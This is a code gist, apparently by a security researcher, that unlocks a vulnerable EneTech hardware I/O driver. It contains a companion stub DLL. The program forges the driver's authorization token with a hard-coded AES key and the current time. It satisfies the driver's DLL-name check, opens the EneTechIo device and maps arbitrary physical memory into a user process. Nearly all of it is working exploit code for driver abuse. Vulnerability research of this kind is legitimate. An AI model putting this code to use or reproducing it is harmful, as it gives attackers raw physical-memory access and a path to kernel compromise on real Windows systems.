@hfiref0x
Created August 12, 2020 12:26
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
//
// WinIo-style IOCTL encoding: device type 0x8010 with function ids 0x810 (map)
// and 0x811 (unmap). The trailing comments give the fully encoded codes, which
// are also the values to look for when auditing what a process sends this driver.
//
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_MAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040
#define IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_UNMAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044
//
// TinyAES is plain C; give it C linkage when this unit is compiled as C++
// (the <cstdio> include above implies a C++ build).
//
#ifdef __cplusplus
extern "C" {
#include "aes.h" //TinyAES
}
#endif
//
// In/out buffer for the map and unmap IOCTLs. The same structure is passed as
// both the input and the output buffer (see WinIoMapMemory2 / WinIoUnmapMemory2).
//
typedef struct _WINIO_PHYSICAL_MEMORY_INFO_EX {
    ULONG_PTR CommitSize;       // in (map): number of bytes to map
    ULONG_PTR BusAddress;       // in (map): physical address of the region
    HANDLE SectionHandle;       // out (map) / in (unmap): driver-provided section handle
    PVOID BaseAddress;          // out (map) / in (unmap): user-mode base of the mapping
    PVOID ReferencedObject;     // out (map) / in (unmap): driver-provided value, opaque to this code
    UCHAR EncryptedKey[16];     // in: AES-128-ECB block derived from the current time (see callers)
} WINIO_PHYSICAL_MEMORY_INFO_EX, * PWINIO_PHYSICAL_MEMORY_INFO_EX;
//
// MSR read request/response layouts. Declared here but not referenced anywhere
// in this listing.
//
typedef struct _WINIO_READ_MSR_INPUT {
    ULONG Msr;
    UCHAR EncryptedKey[16];     // same 16-byte token layout as the memory requests
} WINIO_READ_MSR_INPUT, * PWINIO_READ_MSR_INPUT;
typedef struct _WINIO_READ_MSR_OUTPUT {
    ULONG MsrLow;
    UCHAR SpareBytes[16];
    ULONG MsrHigh;
} WINIO_READ_MSR_OUTPUT, * PWINIO_READ_MSR_OUTPUT;
//
// Hard-coded 128-bit AES key handed to AES_init_ctx below. Presumably the driver
// holds the same key; a secret embedded in a shipped binary is not an access
// control, since anyone with the binary has it.
//
ULONG g_UnlockKey[4] = { 0x9984FD3E, 0x70683A8, 0xBD444418, 0x5E10D83 };
//
// Current UTC time as whole seconds since 1970-01-01, read from the
// high-resolution system clock. The BOOLEAN result of
// RtlTimeToSecondsSince1970 is not checked.
//
ULONG GetTimeAsSecondsSince1970()
{
    ULONG unixSeconds = 0;
    LARGE_INTEGER now;

    // FILETIME and LARGE_INTEGER are both 64-bit 100ns tick counts; the cast
    // only changes the type the API wants to see.
    GetSystemTimePreciseAsFileTime((PFILETIME)&now);
    RtlTimeToSecondsSince1970(&now, &unixSeconds);

    return unixSeconds;
}
//
// Thin NtDeviceIoControlFile wrapper. No event or APC is supplied, so it is
// expected to be used on a handle opened without FILE_FLAG_OVERLAPPED (as main
// does). Returns TRUE on NT_SUCCESS and always mirrors the NT status into the
// Win32 last-error value (ERROR_SUCCESS on success), so callers can rely on
// GetLastError() for diagnostics.
//
BOOL WinIoCallDriver(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG IoControlCode,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _In_opt_ PVOID OutputBuffer,
    _In_opt_ ULONG OutputBufferLength)
{
    IO_STATUS_BLOCK iosb;
    NTSTATUS status = NtDeviceIoControlFile(DeviceHandle,
                                            NULL,           // Event
                                            NULL,           // ApcRoutine
                                            NULL,           // ApcContext
                                            &iosb,
                                            IoControlCode,
                                            InputBuffer,
                                            InputBufferLength,
                                            OutputBuffer,
                                            OutputBufferLength);

    SetLastError(RtlNtStatusToDosError(status));
    return NT_SUCCESS(status) ? TRUE : FALSE;
}
//
// Ask the driver to map NumberOfBytes of physical memory starting at
// PhysicalAddress into this process.
//
// Returns the user-mode base address of the mapping, or NULL on failure (the
// Win32 last error is set by WinIoCallDriver). On success *SectionHandle and
// *ReferencedObject receive driver-provided values that must be handed back
// unchanged to WinIoUnmapMemory2; both are cleared to NULL on entry.
//
PVOID WinIoMapMemory2(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG_PTR PhysicalAddress,
    _In_ ULONG NumberOfBytes,
    _Out_ HANDLE* SectionHandle,
    _Out_ PVOID* ReferencedObject)
{
    AES_ctx ctx;
    WINIO_PHYSICAL_MEMORY_INFO_EX request;

    *SectionHandle = NULL;
    *ReferencedObject = NULL;

    RtlSecureZeroMemory(&ctx, sizeof(ctx));
    AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);

    RtlSecureZeroMemory(&request, sizeof(request));
    request.CommitSize = NumberOfBytes;
    request.BusAddress = PhysicalAddress;

    // Authorization token: the 16-byte block is zero except for the current
    // time in seconds (4 bytes, host byte order), then encrypted in place with
    // AES-128-ECB under g_UnlockKey. Presumably the driver decrypts and compares
    // against its own clock; the tolerance it accepts is not visible here.
    ULONG seconds = GetTimeAsSecondsSince1970();
    RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(seconds));
    AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);

    // The request buffer doubles as the output buffer: on success the driver
    // has written SectionHandle, ReferencedObject and BaseAddress back into it.
    if (WinIoCallDriver(DeviceHandle,
        IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY,
        &request,
        sizeof(request),
        &request,
        sizeof(request)))
    {
        *SectionHandle = request.SectionHandle;
        *ReferencedObject = request.ReferencedObject;
        return request.BaseAddress;
    }
    return NULL;
}
//
// Release a mapping obtained from WinIoMapMemory2. SectionToUnmap,
// SectionHandle and ReferencedObject must be the values that call returned.
//
// The IOCTL result is discarded, so a failed unmap is silent; callers that
// care can inspect GetLastError(), which WinIoCallDriver always sets.
//
VOID WinIoUnmapMemory2(
    _In_ HANDLE DeviceHandle,
    _In_ PVOID SectionToUnmap,
    _In_ HANDLE SectionHandle,
    _In_ PVOID ReferencedObject
)
{
    AES_ctx ctx;
    WINIO_PHYSICAL_MEMORY_INFO_EX request;

    RtlSecureZeroMemory(&ctx, sizeof(ctx));
    AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);

    // Echo back the three driver-provided values; CommitSize and BusAddress
    // stay zero for the unmap request.
    RtlSecureZeroMemory(&request, sizeof(request));
    request.BaseAddress = SectionToUnmap;
    request.ReferencedObject = ReferencedObject;
    request.SectionHandle = SectionHandle;

    // Same time-derived token as in WinIoMapMemory2: seconds since 1970 in the
    // first 4 bytes of an otherwise zero block, AES-128-ECB encrypted in place.
    ULONG seconds = GetTimeAsSecondsSince1970();
    RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(ULONG));
    AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);

    WinIoCallDriver(DeviceHandle,
        IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY,
        &request,
        sizeof(request),
        &request,
        sizeof(request));
}
//
// Smoke test: load the companion DLL the driver looks for in the calling
// process, open the EneTechIo device, map 1 MiB of physical memory at 0x12000
// and unmap it again.
//
// Returns -1 when the device cannot be opened, 0 otherwise. A failed
// LoadLibraryEx or a failed mapping is not reflected in the exit code; the
// latter is only reported on stdout.
//
int main()
{
    // According to the DLL notes below, the driver checks for this module by
    // exact name, so it must be resolvable through the default search path.
    // The module handle is never released; process exit unloads it.
    HMODULE hLib = LoadLibraryEx(L"SB_SMBUS_SDK.dll", NULL, 0);
    if (hLib) {
        // Opened without FILE_FLAG_OVERLAPPED, which WinIoCallDriver relies on.
        HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\EneTechIo"),
            GENERIC_READ | GENERIC_WRITE,
            0,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);
        if (deviceHandle == INVALID_HANDLE_VALUE) {
            printf_s("[!] Unable to open device\r\n");
            return -1;
        }
        else {
            printf_s("[+] EneTechIo device opened\r\n");
        }

        // Outputs of WinIoMapMemory2, which NULLs them on entry.
        HANDLE sectionHandle;
        PVOID refObject;
        PVOID mappedMemory;
        ULONG_PTR mapAddress = 0x12000;

        mappedMemory = WinIoMapMemory2(deviceHandle,
            mapAddress,
            1024 * 1024,
            &sectionHandle,
            &refObject);
        if (mappedMemory) {
            // %llx assumes a 64-bit build, where ULONG_PTR is 64 bits wide.
            printf_s("[+] IOCTL %lx succeeded, physmem at %llx mapped\r\n",
                IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY, mapAddress);
            WinIoUnmapMemory2(deviceHandle,
                mappedMemory,
                sectionHandle,
                refObject);
        }
        else {
            printf_s("[!] Could not map physical memory\r\n");
        }
        CloseHandle(deviceHandle);
    }
    return 0;
}
//
// SB_SMBUS_SDK.dll
//
//
// Warning: the DLL name must be exactly SB_SMBUS_SDK.dll (case-sensitive) because of a name check on the driver side.
//
//
// CRT linkage for the DLL when built with Visual Studio 2015 or later
// (_MSC_VER >= 1900): debug builds pull in the debug runtime libraries,
// release builds link the static lib* variants.
//
#if defined(_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif
#include <Windows.h>
//
// Minimal entry point for the stub DLL: it carries no code of its own and only
// exists to be present in the process under the expected name. Thread
// attach/detach notifications are switched off on process attach; every
// reason code returns TRUE.
//
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    UNREFERENCED_PARAMETER(lpReserved);

    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        DisableThreadLibraryCalls(hinstDLL);
        break;
    default:
        break;
    }

    return TRUE;
}